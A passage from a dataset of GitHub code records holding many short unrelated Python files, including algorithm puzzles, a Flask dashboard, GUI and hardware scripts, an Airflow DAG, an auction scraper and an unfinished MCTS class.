[x for _, x in sorted(zip(scores, populations))]\n # after sorting populations break if the iteration counts are finished\n if i > iterations_count:\n break\n new_population = [0] * populations_count\n # mix the first 30 for the first 60 of populations\n for index, pop in enumerate(populations[:int(0.3 * populations_count)]):\n couple_pop = populations[int(0.6 * populations_count) - index]\n # print(index, int(0.6 * populations_count) - index)\n new_population[index * 2], new_population[(index * 2) + 1] = self.mix_genomes(pop, couple_pop)\n # make 40 new genomes for the least 40 populations\n new_population[int(0.6 * populations_count):] = self.make_population(int(0.4 * populations_count))\n populations = new_population\n i += 1\n\n print(\"best score in total was {}\".format(self.total_best_score))\n print(self.best_population)\n return self.best_population\n","repo_name":"jimist/midi_genetic","sub_path":"genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26082410113","text":"from enum import Enum\nimport json\n\n\nclass Color(Enum):\n RED = 1\n GREEN = 2\n BLUE = 3\n\n\nprint(type(Color.RED)) # \nprint(isinstance(Color.RED, Color)) # True\nprint(Color.RED.name) # RED\nprint(Color.RED.value) # 1\nprint(Color.RED in Color) # True\nprint(Color.RED == 1) # False\nprint(Color.RED is 1) # False\n\nrgb = {\n Color.RED: '#ff0000',\n Color.GREEN: '#00ff00',\n Color.BLUE: '#0000ff'}\n\nprint(Color(1))\nprin(Color['RED'] == Color(1)) # True\n\nfor color in Color:\n print(color)\nprint(list(Color))\n\n# Errors:\n#Color['YELLOW'] = 3\n#Color.RED.value = 100\n\n\nclass Color(Enum):\n pass\n\n\nclass RGB(Color):\n RED = 1\n GREEN = 2\n BLUE = 3\n\n\nclass RGBA(RGB):\n ALPHA = 4\n\n\nclass ResponseStatus(Enum):\n PENDING = 'pending'\n FULFILLED = 'fulfilled'\n REJECTED = 'rejected'\n\n\nresponse = '{\"status\": \"fulfilled\"}'\ndata = json.loads(response)\nstatus = data['status']\nprint(ResponseStatus(status))\n","repo_name":"damiansp/completePython","sub_path":"pytut/enum_.py","file_name":"enum_.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42741173925","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\nimport json\nimport connectingToDB as surgDB\nfrom MyJSONEncoder import MyJSONEncoder\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.json_encoder = MyJSONEncoder\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/movement')\ndef movement():\n return render_template(\"movement.html\")\n\n@app.route('/search')\ndef search():\n return render_template(\"search.html\")\n\n@app.route('/search/allTerms')\ndef search_allTerms():\n colNames = [\"label\", \"category\", \"value\"]\n allData = surgDB.getJSON(\"ServerDatafiles/getSearchSuggestions.sql\", colNames)\n return jsonify(allData)\n\n@app.route(\"/dashboard/search//\")\ndef dashboard_search(id, category):\n colNames = [\"ClinicDate\", \"IsDirect\", \"WasScreened\", \"ScreenDate\", \"IsSurgical\", \"AppScore\", \"ComplexityScore\"]\n colNames += [\"ValueScore\", \"Location\", \"Name\", \"Diagnosis\", \"Referring_Doc\", \"Practice\", \"Insurance\", \"IsMedicaid\"]\n\n allPatientData = surgDB.customSearchQuery(category, id, colNames)\n return jsonify(allPatientData)\n\n\n@app.route(\"/dashboard/patients\")\ndef dashboard_patients():\n colNames = [\"ClinicDate\", \"IsDirect\", \"WasScreened\", \"ScreenDate\", \"IsSurgical\", \"AppScore\", \"ComplexityScore\"]\n colNames += [\"ValueScore\", \"Location\", \"Diagnosis\", \"Referring_Doc\", \"Practice\", \"Insurance\", \"IsMedicaid\"]\n allPatients_json = surgDB.getJSON(\"ServerDatafiles/mainSelect.sql\", colNames)\n return jsonify(allPatients_json)\n\n@app.route(\"/dashboard/movement\")\ndef dashboard_movement():\n \n colNames = [\"Type\", \"Name\", \"ThisYear\", \"ThisQuarter\", \"NumPatients\", \"NumSurgical\", \"LastYear\", \"LastQuarter\"]\n colNames += [\"LastPatients\", \"LastSurgical\", \"qAvgPatients\", \"qAvgSurgical\"]\n print(datetime.now().time())\n allPatientChanges = surgDB.getJSON(\"ServerDatafiles/PercChangeSelect.sql\", colNames)\n print(datetime.now().time())\n dataReturn = jsonify(allPatientChanges)\n print(datetime.now().time())\n return dataReturn\n\nif __name__ == '__main__':\n app.run()","repo_name":"srikasip/surgeryDash","sub_path":"dashboardserver.py","file_name":"dashboardserver.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20405633102","text":"def problem2():\r\n\twith open(\"Day10/input2.txt\") as f:\r\n\t lines = f.read().splitlines() \r\n\tlines = [x.strip(\"\") for x in lines]\r\n\r\n\tbrackets_dict = {\"(\": \")\", \")\": \"(\", \"{\": \"}\", \"}\": \"{\", \"[\": \"]\", \"]\": \"[\", \"<\": \">\", \">\": \"<\"}\r\n\tbrackets_score = {\")\": 1, \"]\": 2, \"}\": 3, \">\": 4}\r\n\topen_chars = \"({[<\"\r\n\tclose_chars = \")}]>\"\r\n\r\n\tscores = []\r\n\r\n\tfor line in lines:\r\n\t\tline_score = 0\r\n\t\tstack = []\r\n\t\tcorrupted = False\r\n\r\n\t\tfor char in line:\r\n\t\t\tif char in open_chars:\r\n\t\t\t\tstack.append(char)\r\n\t\t\telse:\r\n\t\t\t\tif stack.pop() != brackets_dict[char]:\r\n\t\t\t\t\tcorrupted = True\r\n\t\t\t\t\tbreak\r\n\r\n\t\tif not corrupted:\r\n\t\t\tfor char in reversed(stack):\r\n\t\t\t\tclose_bracket = brackets_dict[char]\r\n\t\t\t\tline_score = (line_score * 5) + brackets_score[close_bracket]\r\n\t\t\r\n\t\t\tscores.append(line_score)\r\n\r\n\tscores.sort()\r\n\r\n\treturn scores[len(scores)//2]\r\n\t\r\nprint(problem2())","repo_name":"antoine1242/AdventOfCode","sub_path":"2021/Day10/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18122780816","text":"from tkinter import *\nimport tkinter as tk \nimport main,client\nfrom tkinter import messagebox\ndef mainPage():\n root.destroy()\n main.Display()\n\ndef createService():\n check=client.add_service(entry_1.get(),entry_2.get(),entry_3.get())\n if(check==0):\n messagebox.showerror(None,\"Account is not logged in\")\n elif(check==1):\n messagebox.showinfo(None,\"Congrats you added a new Service!\")\n \ndef Display():\n global root\n global entry_1\n global entry_2\n global entry_3\n root=tk.Tk()\n root.state('zoomed')\n label = tk.Label(text=\"Create a New service \")\n label.pack(side=\"top\", fill=\"x\", pady=10)\n button = tk.Button(text=\"Main\",command=mainPage)\n button.pack(side = BOTTOM)\n \n label2 = tk.Label(text = \"Service Name: \",bg = \"white\", width = 15, font = (\"arial\", 10,\"bold\")) \n label2.place(x =5, y=130)\n label3 = tk.Label(text = \"Username: \",bg = \"white\", width = 15, font = (\"arial\", 10,\"bold\")) \n label3.place(x =5, y=180)\n label4 = tk.Label(text = \"Password: \",bg = \"white\", width = 15, font = (\"arial\", 10,\"bold\")) \n label4.place(x =5, y=230)\n submit=tk.Button(text=\"Submit\",command=createService)\n submit.place(x=10,y=280)\n \n entry_1 = tk.Entry(root)\n entry_1.place(x = 115, y =130)\n entry_2 = tk.Entry(root)\n entry_2.place(x = 115, y =180)\n entry_3 = tk.Entry(root)\n entry_3.place(x=115, y=230)\n ","repo_name":"etoy22/Password-Manager","sub_path":"Password-Manager-main/Client Files/Service.py","file_name":"Service.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73643909521","text":"import os\nimport sys\ndrive, path = os.path.splitdrive(os.path.dirname(os.path.realpath(__file__)))\nsys.path.insert(0, os.path.join(drive, os.sep, *path.split(os.sep)[:2]))\nfrom auxiliary.paths import model_paths_imagenet, model_paths_imdb\nfrom auxiliary.settings import models, seed\nfrom data.dataloaders import load_data\nimport torch\nfrom tqdm import tqdm\n\n# ----------------------------------------\ntorch.manual_seed(seed)\n# ----------------------------------------\n\n\nclass ParameterRandomization:\n\n def __init__(self, model_type=\"inception_v3\"):\n\n self.model_type = model_type\n\n if 'lstm' in self.model_type:\n self.dataset = \"imdb\"\n TEXT, vocab_size, word_embeddings, train_iter, valid_iter, test_iter = load_data.load_dataset()\n batch_size = 32\n output_size = 2\n hidden_size = 256\n embedding_length = 300\n self.base_model = models[self.model_type](batch_size, output_size, hidden_size,\n vocab_size, embedding_length, word_embeddings)\n self.base_model.load_state_dict(torch.load(model_paths_imdb[self.model_type]))\n self.destination_path = os.path.join(os.path.dirname(\n model_paths_imdb[self.model_type]),\n self.model_type + \"_randomized\")\n\n else:\n self.dataset = \"imagenet\"\n self.base_model = models[self.model_type](init_weights=False)\n self.base_model.load_state_dict(torch.load(model_paths_imagenet[self.model_type]))\n self.destination_path = os.path.join(os.path.dirname(\n model_paths_imagenet[self.model_type]),\n self.model_type + \"_randomized\")\n\n os.makedirs(self.destination_path, exist_ok=True)\n self.important_layers = {}\n\n self.store_original_parameters()\n self.save_randomized_models()\n\n def store_original_parameters(self):\n\n model_blocks = []\n\n if self.model_type == \"inception_v3\":\n model_blocks = [\"conv2d_1a\", \"conv2d_2a\", \"conv2d_2b\", \"conv2d_3b\",\n \"conv2d_4a\", \"mixed_5b\", \"mixed_5c\", \"mixed_5d\",\n \"mixed_6a\", \"mixed_6b\", \"mixed_6c\", \"mixed_6d\",\n \"mixed_6e\", \"mixed_7a\", \"mixed_7b\", \"mixed_7c\",\n \"logits\"]\n\n elif self.model_type == \"mobilenet_v2\":\n model_blocks = [\"features.\" + str(i) for i in range(0, 19)]\n\n elif self.model_type == \"vgg_16\":\n model_blocks = [\"features.0\", \"features.2\", \"features.5\",\n \"features.7\", \"features.10\", \"features.12\",\n \"features.14\", \"features.17\", \"features.19\",\n \"features.21\", \"features.24\", \"features.26\",\n \"features.28\"]\n\n elif self.model_type == \"resnet_18\":\n model_blocks = []\n for first_idx in range(1, 5):\n for second_idx in range(0, 2):\n model_blocks.append('layer'+str(first_idx)+'.'+str(second_idx))\n\n elif self.model_type == \"resnet_50\":\n model_blocks = []\n for first_idx in range(1, 5):\n if first_idx == 1:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 2:\n for second_idx in range(0, 4):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 3:\n for second_idx in range(0, 6):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 4:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n\n elif self.model_type == \"resnet_152\":\n model_blocks = []\n for first_idx in range(1, 5):\n if first_idx == 1:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 2:\n for second_idx in range(0, 8):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 3:\n for second_idx in range(0, 36):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n elif first_idx == 4:\n for second_idx in range(0, 3):\n model_blocks.append('layer' + str(first_idx) + '.' + str(second_idx))\n\n elif self.model_type == \"lstm_softatt\":\n model_blocks = ['l0']\n\n elif self.model_type == \"bilstm3_att\":\n model_blocks = ['l0', 'l1', 'l2']\n\n elif self.model_type == \"bilstm6_att\":\n model_blocks = ['l0', 'l1', 'l2', 'l3', 'l4', 'l5']\n\n for element in model_blocks:\n self.important_layers[element] = {}\n\n for layer, param in self.base_model.named_parameters():\n if param.requires_grad:\n this_layer = layer.lower()\n for layer_idx in range(len(model_blocks)):\n if model_blocks[layer_idx] in this_layer:\n self.important_layers[model_blocks[layer_idx]][layer] = param\n\n def save_randomized_models(self):\n folder_idx = 1\n temp_dict = self.base_model.state_dict().copy()\n\n for block_key in tqdm(self.important_layers.keys(), desc=\"Randomizing each block of {}\".format(self.model_type)):\n\n for layer in self.important_layers[block_key].keys():\n random_weights_layer = torch.randn(size=self.important_layers[block_key][layer].size())\n temp_dict[layer] = random_weights_layer\n\n this_destination = os.path.join(self.destination_path, block_key)\n os.makedirs(this_destination, exist_ok=True)\n torch.save(temp_dict, os.path.join(this_destination, 'model.pth'))\n\n for layer in self.important_layers[block_key].keys():\n temp_dict[layer] = self.important_layers[block_key][layer]\n\n folder_idx += 1\n\n print(\"\\n\\n Process complete! Kindly find the models in the subfolders of {}\".format(self.destination_path))\n\n\nif __name__ == \"__main__\":\n\n param_random = ParameterRandomization(model_type=\"bilstm6_att\")","repo_name":"HarshineeSriram/Sensitivity_Tests","sub_path":"parameter_randomization/parameter_randomization.py","file_name":"parameter_randomization.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3851704048","text":"\"\"\"\nGiven a string s consists of upper/lower-case alphabets and empty space characters ' ',\nreturn the length of last word (last word means the last appearing word if we loop from left to right) in the string.\nIf the last word does not exist, return 0.\n\nExample 1:\n Input: \"Hello World\"\n Output: 5\n\"\"\"\n\n\nclass Solution:\n def lengthOfLastWord(self, s: str) -> int:\n s = s.strip()\n try:\n if ' ' in s:\n s = s.split(' ')\n return len(s[-1])\n else:\n return len(s)\n except:\n return 0\n# Runtime: 28 ms, faster than 60.70% (2020/03/18)\n# Memory Usage: 12.8 MB, less than 100.00% (2020/03/18)\n\n","repo_name":"okayell/LeetCode","sub_path":"Easy/58.Length_of_Last_Word.py","file_name":"58.Length_of_Last_Word.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37602491224","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 21 14:40:38 2018\n\n@author: KunXunLee\n\"\"\"\nimport pandas as pd\n\n\ndef nsdata(st1,a,b):\n \n nst1=[]\n stdata=st1.iloc[0:,0]\n for index in range(len(stdata)):\n st1.loc[index]\n x_min=st1.min(axis=0)\n normalize=(st1.loc[index] - x_min) / (a - b)\n nst1.append(normalize)\n # 正規化訊號\n nst1=pd.DataFrame(nst1)\n \n \n return nst1\n \n \n \n \n \n \n ","repo_name":"IESSC/special-subject","sub_path":"2.藍芽智慧刀把/Python應變訊號分析上傳/normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35832422799","text":"# Author: Ziyu Lu\n# Email: zl1546@nyu.edu\n# Date: July 2019\n# Description: This program defines the constant coefficients for the Kalman filter optimization problem\n\nimport math\nimport cmath\nimport numpy as np\n\n# constants\nm = 1 # mass of the object\nk = 0.5 # spring constant\ngamma = 0.1 # friction coefficient\nomega = k/m\nmu = gamma/m\nw = math.sqrt(omega - 0.25*mu**2)\nN = 4 # number of time steps in one simulation\ndt = 0.05 # step size in one simulation\nsigma = 0.1 # noise coefficient in SDE\nQ = 0.1 # observation noise variance\nX0 = np.array([[1.0],[0.0]]) # initial state (X = [x, v]^T)\nC = np.array([1.0, 0.0], ndmin=2) # observation matrix\n\n\nlambda1 = complex(-0.5*mu,w)\nlambda2 = complex(-0.5*mu,-w)\n\n# construct matrix A\nA11 = lambda2*cmath.exp(lambda1*dt) - lambda1*cmath.exp(lambda2*dt)\nA12 = -cmath.exp(lambda1*dt) + cmath.exp(lambda2*dt)\nA21 = lambda1*lambda2*(cmath.exp(lambda1*dt) - cmath.exp(lambda2*dt))\nA22 = -lambda1*cmath.exp(lambda1*dt) + lambda2*cmath.exp(lambda2*dt)\nA = np.array([[A11, A12], [A21, A22]])\nA = np.divide(A, lambda2-lambda1) # A turns out to be real\nA = A.real\n\n# print(A)\n\n# construct covariance matrix R\ne1 = cmath.exp(2*lambda1*dt)\ne2 = cmath.exp(2*lambda2*dt)\ne3 = cmath.exp((lambda1 + lambda2)*dt)\nR11 = 0.5*(e1-1)/lambda1 + 0.5*(e2-1)/lambda2 - 2*(e3-1)/(lambda1 + lambda2)\nR12 = 0.5*(e1-1) + 0.5*(e2-1) - (e3-1)\nR21 = R12\nR22 = lambda1*0.5*(e1-1) + lambda2*0.5*(e2-1) - 2*lambda1*lambda2*(e3-1)/(lambda1 + lambda2)\nR = np.array([[R11, R12], [R21, R22]])\nR = np.multiply(R, (sigma/(lambda2-lambda1))**2) # R turns out to be real\nR = R.real\n\n# print(R)\n","repo_name":"ziyulu-uw/sure-2019","sub_path":"sure/Ziyu_code/SGD_modularized/Initialization.py","file_name":"Initialization.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4343441516","text":"'''\nThis is from https://www.tutorialspoint.com/python/python_multithreading.htm\nCopy and pasted from the last block of code\n\nIf you remove the Queue lock on lines 29 - 35 you may complete things from the queue out of order\n'''\nfrom auction_scrape import get_auction_data\nfrom handle_page_timeout import handle_page_timeout\nfrom link_scrape import load_auction_links, update_auction_links\nfrom store_auction_data import store_auction_data\n# everything above is imported from project files\nfrom selenium import webdriver\nfrom msvcrt import getch # for detecting esc key press to end the program\nimport os # for grabbing the chrome_driver file path\nimport queue\nimport threading\nimport time\n\n\nexitFlag = 0 # don't forget this is a global var\nrelative_dir = os.getcwd()\nchromedriver_path = relative_dir + '\\chromedriver'\nqueueLock = threading.Lock()\nlink_q = queue.Queue()\nlink_driver = webdriver.Chrome(chromedriver_path)\n# visited links list was for testing only\nvisited_links = []\n\nclass myThread(threading.Thread):\n \n def __init__(self, tName, link_q):\n\n threading.Thread.__init__(self)\n self.tName = tName\n self.link_q = link_q\n \n def run(self):\n\n print(\"Starting \" + self.tName)\n open_auction(self.name, self.link_q)\n print(\"Exiting \" + self.tName)\n\ndef open_auction(threadName, link_q):\n \n while not exitFlag:\n print(\"Exit Flag is {}\".format(exitFlag))\n queueLock.acquire() # queueLock runs this synchronously for this code only\n if not link_q.empty():\n auction_link = link_q.get()\n visited_links.append(auction_link)\n print(\"Link_q Size : {}\".format(link_q.qsize()))\n if link_q.qsize() <= 10:\n print(\"---------- Adding new links into queue\")\n refill_link_q()\n queueLock.release()\n\n print(\"Thread {} will open link {}\".format(threadName, auction_link))\n # open driver and begin scraping\n auction_data = get_auction_data(auction_link)\n # store the auction data in the data base if there were no errors\n if auction_data is not None:\n store_auction_data(auction_data)\n else:\n queueLock.release()\n time.sleep(1)\n\ndef refill_link_q():\n global link_q\n handle_page_timeout(link_driver)\n link_q = update_auction_links(link_driver, link_q)\n\ndef run_scraper():\n global link_q # get initial link queue from global variable\n \n print(\"Initializing driver and loading voucher page\")\n link_driver.get(\"http://www.quibids.com/en/category-12-vouchers-and-limit-busters/\")\n\n print(\"Fetching initial auction links\")\n link_q = load_auction_links(link_driver, link_q)\n\n print(\"Number of links is : {}\".format(link_q.qsize()))\n\n threadList = [\"Thread-1\", \"Thread-2\", \"Thread-3\"]\n threads = []\n\n # Create new threads\n for tName in threadList:\n thread = myThread(tName, link_q)\n thread.start()\n threads.append(thread)\n\n # Press esc key to stop scraping and exit threads\n while True:\n key = ord(getch())\n if key == 27: # ESC key\n break\n\n print(\"ESC key pressed. Setting exit flag and closing threads\")\n\n # Notify threads it's time to exit\n global exitFlag # do this globally\n exitFlag = 1\n\n # Wait for all threads to complete\n for t in threads:\n t.join()\n print(\"Exiting Main Thread\")\n link_driver.quit()\n print(\"Visited Links:\")\n for link in visited_links:\n print(link)\n\nif __name__ == '__main__':\n run_scraper()\n","repo_name":"Chris-Draper/quibid-scraper","sub_path":"voucher_threading.py","file_name":"voucher_threading.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73381689042","text":"def nth_ugly_number(n):\n \"\"\"\n Return nth ugly number\n Explanation: 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first\n 10 ugly numbers\n\n >>> nth_ugly_number(10)\n 12\n \"\"\"\n if n == 0:\n return 0\n i, j, k = 0, 0, 0\n numbers = [1]\n while len(numbers) < n:\n t1 = numbers[i] * 2\n t2 = numbers[j] * 3\n t3 = numbers[k] * 5\n min_those = min(t1, t2, t3)\n numbers.append(min_those)\n if min_those == t1:\n i += 1\n if min_those == t2:\n j += 1\n if min_those == t3:\n k += 1\n return numbers[n - 1]\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"erdenezul/leetcode","sub_path":"src/ugly_number2.py","file_name":"ugly_number2.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71639351442","text":"import argparse\nfrom NVE_lj import VV_mdlj\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--kt\",type=float,default=0.694,help='The temperature of the system.', required=False)\nparser.add_argument(\"--nstep\",type=int,default=1000,help='Total number of timesteps to run the simulation for.', required=False)\nparser.add_argument(\"--mode\",type=int,default=0,help='Initialization mode (see notes).' , required=False)\nparser.add_argument(\"--dt\",type=float,default=0.005,help='Size of timestep to use.' , required=False)\nargs = parser.parse_args()\n\nkt=args.kt\nnstep=args.nstep\nmode=args.mode\ndt=args.dt\nVV_mdlj(mode=mode,nstep=nstep,dt=dt,freq=10,kt=kt)\n","repo_name":"Taylor-96/PythonMDTutorial","sub_path":"nve-nvt_lennard-jones/NVE_main.py","file_name":"NVE_main.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15343914064","text":"import sys\nimport time\nfrom mfrc522 import SimpleMFRC522\nfrom RPi import GPIO\nimport smbus2\nimport time\nfrom RPLCD.i2c import CharLCD\nimport threading\nsys.modules['smbus'] = smbus2\n\ndef run_time():\n while True:\n lcd = CharLCD('PCF8574', address=0x27, port=1, backlight_enabled=True)\n lcd.clear()\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n lcd.cursor_pos = (0, 0)\n t=time.strftime(\"%Y/%m/%d\",timeArray)\n lcd.write_string(t) \n lcd.cursor_pos = (1, 0)\n t=time.strftime(\"%H:%M:%S\",timeArray)\n lcd.write_string(t)\n time.sleep(1)\n lcd.clear()\n\nrt = threading.Thread(target = run_time)\nif __name__ == \"__main__\":\n lcd = CharLCD('PCF8574', address=0x27, port=1, backlight_enabled=True)\n lcd.clear()\n rt.start()\n reader = SimpleMFRC522()\n try:\n while True:\n card_id,card_text = reader.read()\n lcd.clear()\n lcd.cursor_pos = (0, 0)\n t=time.strftime(str(card_id))\n lcd.write_string(t)\n lcd.cursor_pos = (1, 0)\n t=time.strftime('welcome')\n lcd.write_string(t)\n time.sleep(1)\n except KeyboardInterrupt:\n print('bye')\n finally:\n GPIO.cleanup()\n rt.join()\n","repo_name":"JianDa0127/GitHub_JianDa","sub_path":"RaspberryPi/lcd_card.py","file_name":"lcd_card.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36053785425","text":"n = int(input())\n\n# 거슬러 줄 수 있을 때, 5원을 최대한 많이 주어야 함\n# 1. 거슬러 줄 수 있을지 판단\n# 2. 5원을 몇 개 줄 수 있는지 판단\n# 즉, n = 5*x + 2*y 를 만족하는 x+y의 최솟값 찾기 > x가 최대한 커야함\n# 최대한의 x 를 계산한 후 만족할 때 가지 하나씩 줄여나가다가 끝까지 가서도 만족 못하면 -1 출력\n\nsolution =0\n# x 는 n을 5로 나누었을 때의 몫 즉 초기의 최대 배치 가능한 5원의 개수\nx = int(n//5)\n\n\nwhile True:\n\t# 5원을 x 개 일때 최대 가능한 2원의 수\n\ty = (n-5*x) // 2\n\t# 값을 만족하면 x+y를 하고 반복문 탈출\n\tif n == 5*x + 2*y:\n\t\tsolution = x+y\n\t\tbreak\n\t# 값을 만족하지 않는다면?\n\telse :\n\t\t# 5원의 개수를 하나씩 줄이기\n\t\tx -=1\n\t# 거슬러 줄 수 없는 경우 생각하기\n\t# x 를 하나씩 줄이므로 x가 0이 되었을 때도 못하면 거슬러 줄 수 없음\n\tif x < 0:\n\t\tsolution = -1\n\t\tbreak\n\nprint(solution)\n\t\n\n\n\n\n","repo_name":"Sangmin627/AlgoStudy2023","sub_path":"현준/백준/[그리디]_14916_거스름돈.py","file_name":"[그리디]_14916_거스름돈.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"38845287204","text":"from airflow import DAG\nfrom airflow.operators import PythonOperator\nfrom datetim import datetime\n\ndefault_args = {\n 'owner':'eyank',\n 'depends_on_past': False,\n 'start_date': 'datetime(2018, 1, 1)',\n 'retries': 0\n}\n\ndag = DAG('python_hello_world_dag',\n default_args=default_args,\n catchup=False,\n schedule_interval='00 20 * * *')\n\ndef hello():\n return print('hello, world')\n\ndef sum_int():\n return print(2+2)\n\n# def my_name():\n# return print ('i am Elena')\n\n# def sys_path():\n# return print(pathlib.Path(__file__).parent.absolute())\n\nt1 = PythonOperator(\n task_id = 'print_hello_world',\n python_callable = hello,\n dag = dag)\n\nt2 = PythonOperator(\n task_id = 'sum_task',\n python_callable = sum_int,\n dag = dag)\nt1 >> t2\n","repo_name":"elenka-yank/lesson1","sub_path":"python_example_dag.py","file_name":"python_example_dag.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30324515990","text":"import functions\n\nfrom pathlib import Path\n\ndir = Path(__file__).parent.resolve()\n\nfilename = dir / \"input.txt\"\n\nSCORES = {\"X\": 1, \"Y\": 2, \"Z\": 3}\n\nWINS = [\"A Y\", \"B Z\", \"C X\"]\n\nDRAWS = [\n \"A X\",\n \"B Y\",\n \"C Z\",\n]\n\nLOSS = [\"A Z\", \"B X\", \"C Y\"]\n\nCONVERTER = {\n \"X\": {\"A\": \"Z\", \"B\": \"X\", \"C\": \"Y\", \"score\": 0},\n \"Y\": {\"A\": \"X\", \"B\": \"Y\", \"C\": \"Z\", \"score\": 3},\n \"Z\": {\"A\": \"Y\", \"B\": \"Z\", \"C\": \"X\", \"score\": 6},\n}\n\n\ndef task1():\n _input = functions.read_file_to_list(filename, str)\n\n answer = 0\n\n for comp in _input:\n [opp, me] = comp.split(\" \")\n\n if comp in WINS:\n answer += 6 + SCORES[me]\n elif comp in DRAWS:\n answer += 3 + SCORES[me]\n elif comp in LOSS:\n answer += SCORES[me]\n\n print(\"\\tAnswer: \", answer)\n\n\ndef task2():\n _input = functions.read_file_to_list(filename, str)\n\n answer = 0\n\n for comp in _input:\n [opp, me] = comp.split(\" \")\n\n conv = CONVERTER[me]\n answer += conv[\"score\"] + SCORES[conv[opp]]\n\n print(\"\\tAnswer: \", answer)\n\n\nif __name__ == \"__main__\":\n print(\"========== Task 1 ==========\")\n task1()\n print(\"============================\\n\")\n\n print(\"========== Task 2 ==========\")\n task2()\n print(\"============================\")\n","repo_name":"jonajo15/Advent-of-Code-22","sub_path":"src/days/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"20471121229","text":"#%%\nimport networkx as nx\nimport numpy as np\nimport random\n\nclass MCTS():\n def __init__(self, \n game,\n exploration_epsilon=0.25,\n biasedness=1,\n optimizing_player=1):\n\n self.game = game\n self.exploration_epsilon = exploration_epsilon\n self.exploration_coef = np.sqrt(2)\n self.biasedness = biasedness # determines how much the selection of nodes is biased towards strength. 0 is equality, 1 is proportional to strenght, >1 is superlinearly related.\n\n self.g = nx.DiGraph()\n self.nr_players = self.game.nr_players\n self.root = self.game.state_hash\n self.optimizing_player = optimizing_player\n\n self.g.add_node(node_for_adding=self.game.state_hash, \n rewards= np.zeros(self.nr_players),\n main_player_reward = 0,\n N=0, # number of roll-outs for this node\n terminal=False,\n leads_to_terminal=False, # unless there is only one state\n leaf=True,\n # uct=0, # not needed at the moment\n N_children=0,\n N_leads_to_terminal_child_edges=0,\n depth=0,\n parents=[],\n N_parents=0,\n current_player=int(self.game.state_hash[0]))\n \n def expand(self, node, return_random=True):\n # check whether node is terminal\n # undo leaf status of that node.\n current_depth = self.g.nodes[node]['depth']\n self.game.initialize_from_state(node)\n opts = self.game.options()\n children = 0\n # t = self.g.nodes[node]['N']\n leafs = []\n for child, action in opts.items():\n \n if child in self.g.nodes:\n # in this game cycles are forbidden. Check whether its a cycle or just multiple paths joining.\n \n # if its not a cycle, then add the edge, but not the node.\n # if it is a cycle, then add neither the edge nor the node.\n\n # check for cycles:\n condition, _ = self.exists_path(source=child,target=node)\n if condition:\n continue\n\n self.g.add_edge(u_of_edge=node,\n v_of_edge=child,\n leads_to_terminal=False,\n action=action)\n # increment the N_parents of the 'child' node.\n self.g.nodes[child]['parents'].append(node)\n self.g.nodes[child]['N_parents'] += 1\n\n # check whether the terminal conditions should be added.\n if self.g.nodes[child][\"leads_to_terminal\"]:\n self.g.edges[(node,child)][\"leads_to_terminal\"] = True\n self.g.nodes[node]['N_leads_to_terminal_child_edges'] += 1\n self.propagate_leads_to_terminal(node=node)\n else:\n # add first node and then edge\n self.g.add_node(node_for_adding=child,\n rewards=np.zeros(self.nr_players),\n main_player_reward = 0,\n N=0,\n # 